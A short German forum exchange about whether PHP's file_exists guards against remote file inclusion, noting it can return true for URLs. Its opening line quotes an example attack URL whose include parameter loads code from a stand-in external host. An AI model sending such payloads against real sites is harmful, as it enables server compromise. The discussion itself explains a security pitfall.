>http://www.domain.tld/?include=http:%2F%2Fminisaft.tld%2Fschadsoftware%2Fvirus.txt

da sollte file_exists aber kein true melden ...

Das kommt bestimmt auf die PHP-Version und ihre Spielarten an.
http://de2.php.net/manual/en/function.file-exists.php

Ach du heilige... Worauf soll man sich denn da noch verlassen können, wenn das "file" mittlerweile u.U. auch für "resource" steht?
Im Gegenzug fordere ich hiermit, dass allow_url_fopen auch keinen Unterschied zwischen file und resource mehr macht. :-)